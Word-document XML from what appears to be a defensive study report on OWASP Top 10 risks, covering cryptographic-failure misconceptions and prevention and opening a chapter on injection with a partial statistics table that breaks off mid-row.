        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Granular Data Classification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not encrypt everything blindly. Applying heavy application-layer encryption to low-risk, public data wastes CPU cycles. Encrypt strictly according to your data classification matrix (e.g., restricting intensive cryptographic operations to PII, credentials, and financial variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444FB62" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardware Acceleration:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offload TLS termination from the core web application code to specialized hardware edge components, such as API Gateways, Application Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CAEEC"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Balancers (ALBs), or Cloud CDNs that utilize native hardware instructions (like AESNI) to handle encryption without imposing a penalty on software performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F8926" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Developer Education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD427B"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The Number One Misconception: "As long as it's encrypted/hashed, it's secure."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC540F"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 xml:space="preserve">The single most damaging habit in software engineering teams is treating cryptography as a binary checklist item rather than an implementation discipline. Developers frequently </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">assume that if data passes through </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cryptographic function, it is magically protected against attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31218217"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This misconception regularly manifests as two specific coding anti-patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88807F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Confusing Encryption with Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Believing that standard symmetric encryption (like AES-CBC) naturally prevents data tampering. Developers often fail to realize that an attacker can systematically flip bits in a ciphertext cookie to alter the decrypted data on the backend without knowing the secret key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B687AB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Confusing Speed with Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choosing standard, ultra-fast hash algorithms (like SHA-256 or MD5) to store user passwords because they want the login action to execute as fast as possible. They overlook the fact that if the backend database is leaked, an attacker can use standard cloud hardware to compute billions of SHA-256 hashes per second, cracking short or common user passwords in minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F6496"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Breaking the Bad Habit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42DAE9"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 xml:space="preserve">Engineering leads should train developers to adopt a new default mindset: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Never implement custom cryptography wrappers.</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of thinking </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"How do I write a script to encrypt this?"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , the framework default must always be </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Which well-maintained, high-level standard framework module (like an AEAD cipher or Argon2 library) am I importing to handle this automatically?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4DF67" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Summary (Executive Brief)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B6C8C"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerability Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP A04:2025 – Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD03A0F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Risk Level:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61502D62"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Primary Root Cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It occurs when an application fails to identify and protect sensitive data at rest and in transit, relying instead on missing, obsolete, or broken cryptographic implementations, insecure pseudo-random number generators, and flawed key management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA03EF"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Quick Detection Method:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run automated SAST tools to flag hardcoded secrets and banned cryptographic libraries (e.g., MD5, SHA1), paired with targeted dynamic scans (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>testssl.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to catch weak transport layer ciphers and missing HSTS headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5C0EA"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ultimate Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce a strict data classification schema, mandate the use of authenticated encryption algorithms (AEAD like AES-GCM) driven by cryptographically secure random number generators (CSPRNG), and externalize all key infrastructure to an isolated, automated Cloud KMS or HSM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09FA72" w14:textId="75E79288" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key Business Danger:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Severe, permanent regulatory non-compliance fines (such as up to 4% of global turnover under GDPR) alongside the catastrophic loss of consumer trust following a mass public compromise of plain-text credentials and customer PII.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9B1E4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00B74432" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A66CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 6: A05:2025 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47967A66" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2702C"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 xml:space="preserve">During this reporting period, my research and technical analysis focused on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A05:2025 – Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , a critical security flaw that occurs when an application improperly handles untrusted user input. Injection vulnerabilities arise when user-supplied data is directly concatenated into a command or query rather than being treated strictly as data. This allows an attacker to manipulate the context of the input, tricking the underlying interpreter—whether it is a database engine (SQL/NoSQL), a system shell (OS Commands), or an application framework—into executing unintended, malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F62F02"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 xml:space="preserve">In the latest OWASP Top 10 framework, Injection has shifted down two spots to the #5 position. However, this shift does not indicate a decrease in the threat level; rather, it reflects a structural rebalancing against other widespread architectural flaws. Injection remains one of the most thoroughly evaluated categories in modern application security, boasting a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>100% testing coverage rate</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> across assessed applications. It also holds the dangerous distinction of containing the highest volume of total Common Vulnerabilities and Exposures (CVEs) across the entire OWASP landscape. This highlights that despite decades of industry awareness, developers still frequently struggle to safely isolate executable code from user-controlled inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467656A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Statistical Overview &amp; Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E68F3E"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To fully understand the risk profile of Injection vulnerabilities, the following metrics from the OWASP data set were analyzed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2148"/>
        <w:gridCol w:w="1610"/>
        <w:gridCol w:w="5537"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="1E41FB50" w14:textId="77777777" w:rsidTr="00B064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122A2B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Metric </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FE89BFF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B56073" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Signifcance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="288056BC" w14:textId="77777777" w:rsidTr="00B064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52F63D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total Occurrences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DBD7B9E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>1,404,249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="493C4719" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicates an incredibly high volume of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>actve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, real-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>world instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="5E45C56D" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8C3D2B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total Mapped CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4513706A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
